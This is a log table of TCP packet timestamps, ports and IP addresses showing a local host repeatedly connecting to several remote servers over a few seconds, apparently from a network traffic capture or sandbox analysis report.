| Nov 25, 2024 13:47:36.025635004 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.025729895 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.027472019 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.027544975 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.034966946 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.035053968 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.041409969 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.041513920 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.044847965 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.044914961 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.055459023 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.055550098 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.058901072 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.058974981 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.069422007 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.069516897 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.079792023 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.079895973 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.083444118 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.083520889 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.086729050 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.086793900 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.097399950 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.097466946 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.100766897 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.100863934 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.111251116 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.111327887 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.111392975 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.111442089 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.125574112 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.125621080 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.146889925 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.146941900 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.146951914 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.146986008 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.188601971 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.188678980 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.188689947 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.188725948 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.190781116 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.190835953 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.195560932 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.195610046 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.195724010 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.195759058 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.199456930 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.199506044 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.199511051 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.199547052 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.204493999 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.204554081 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.204638958 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.204684973 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.204689026 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.204727888 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.212929010 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.213004112 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.213026047 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.213068008 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.213071108 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.213105917 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.213155985 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.213181019 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.213242054 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.615291119 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:36.735594988 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.735769987 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:36.736192942 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:36.856760979 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:37.927936077 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:37.931982994 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:38.052299976 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:38.271902084 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:38.326543093 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:38.667881012 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:38.667922974 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:38.668003082 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:38.670038939 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:38.670048952 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:39.979598999 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:39.979866028 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:39.983881950 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:39.983890057 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:39.984169006 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:39.987397909 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:40.031344891 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.443363905 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.443444967 CET | 443 | 49865 | 172.67.177.134 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.443547964 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:40.448321104 CET | 49865 | 443 | 192.168.2.9 | 172.67.177.134 |
| Nov 25, 2024 13:47:40.501069069 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:40.621830940 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.839667082 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.889059067 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:40.983666897 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:40.983722925 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.983802080 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:40.984311104 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:40.984323978 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:42.444844961 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:42.445017099 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:42.450277090 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:42.450289965 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:42.450557947 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:42.452374935 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:42.499332905 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:42.499403954 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:42.499419928 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:43.098537922 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:43.098619938 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:43.098689079 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:43.099494934 CET | 49871 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:43.311625957 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:43.312988997 CET | 49877 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:43.432425976 CET | 80 | 49859 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:43.432614088 CET | 49859 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:43.433387995 CET | 80 | 49877 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:43.433554888 CET | 49877 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:43.433701992 CET | 49877 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:43.553723097 CET | 80 | 49877 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:44.581835985 CET | 80 | 49877 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:44.623459101 CET | 49877 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:44.722958088 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:44.723006010 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:44.723079920 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:44.723778963 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:44.723790884 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.140177011 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.142354012 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:46.142369986 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.142410994 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:46.142422915 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.772177935 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.772295952 CET | 443 | 49881 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:46.772403955 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:46.776890039 CET | 49881 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:46.897098064 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:47.024298906 CET | 80 | 49885 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:47.024400949 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:47.024539948 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:47.148022890 CET | 80 | 49885 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:48.429419041 CET | 80 | 49885 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:48.430977106 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:48.431052923 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:48.431449890 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:48.431679964 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:48.431693077 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:48.482919931 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:49.795030117 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:49.796978951 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:49.797012091 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:49.797079086 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:49.797087908 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:50.431308031 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:50.431421041 CET | 443 | 49891 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:50.431535959 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:50.432024956 CET | 49891 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:50.435606003 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:50.436764002 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:50.556735039 CET | 80 | 49896 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:50.556858063 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:50.557024002 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:50.560235977 CET | 80 | 49885 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:50.560316086 CET | 49885 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:50.677238941 CET | 80 | 49896 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:51.699713945 CET | 80 | 49896 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:51.701076984 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:51.701133013 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:51.701209068 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:51.701503038 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:51.701514006 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:51.748483896 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.072545052 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.074242115 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:53.074304104 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.074392080 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:53.074413061 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.739377975 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.739456892 CET | 443 | 49902 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.739562035 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:53.739936113 CET | 49902 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:53.743086100 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.744183064 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.863476038 CET | 80 | 49896 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.863579988 CET | 49896 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.864222050 CET | 80 | 49907 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:53.864291906 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.864502907 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:53.984456062 CET | 80 | 49907 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:55.006190062 CET | 80 | 49907 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:55.007782936 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:55.007838964 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:55.008074999 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:55.008462906 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:55.008476019 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:55.061069012 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:56.495980978 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:56.497716904 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:56.497749090 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:56.497809887 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:56.497826099 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:57.177169085 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:57.177309990 CET | 443 | 49909 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:57.177434921 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:57.177834034 CET | 49909 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:57.181330919 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:57.182574034 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:57.301790953 CET | 80 | 49907 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:57.301860094 CET | 49907 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:57.302640915 CET | 80 | 49915 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:57.302732944 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:57.303009987 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:57.423032999 CET | 80 | 49915 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:58.452670097 CET | 80 | 49915 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:47:58.454086065 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:58.454196930 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:58.454281092 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:58.454560995 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:58.454612017 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:58.498454094 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:47:59.867079020 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:59.869165897 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:59.869201899 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:47:59.869261980 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:47:59.869266987 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:00.630031109 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:00.631679058 CET | 443 | 49921 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:00.631743908 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:00.632016897 CET | 49921 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:00.635035992 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:00.636121988 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:00.755475998 CET | 80 | 49915 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:00.755661964 CET | 49915 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:00.756117105 CET | 80 | 49925 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:00.756201982 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:00.758322001 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:00.879057884 CET | 80 | 49925 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:02.204852104 CET | 80 | 49925 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:02.205977917 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:02.206027985 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:02.206121922 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:02.206406116 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:02.206418991 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:02.248486996 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:03.614315033 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:03.616244078 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:03.616269112 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:03.616314888 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:03.616322041 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:04.249810934 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:04.249892950 CET | 443 | 49929 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:04.249948978 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:04.250339031 CET | 49929 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:04.253395081 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:04.254126072 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:04.374993086 CET | 80 | 49925 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:04.375008106 CET | 80 | 49935 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:04.375051975 CET | 49925 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:04.375107050 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:04.375278950 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:04.495311022 CET | 80 | 49935 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:05.517107964 CET | 80 | 49935 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:05.518408060 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:05.518462896 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:05.518538952 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:05.518919945 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:05.518939972 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:05.560966015 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.004439116 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.006181002 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:07.006220102 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.006278992 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:07.006289959 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.632683992 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.632757902 CET | 443 | 49940 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.632826090 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
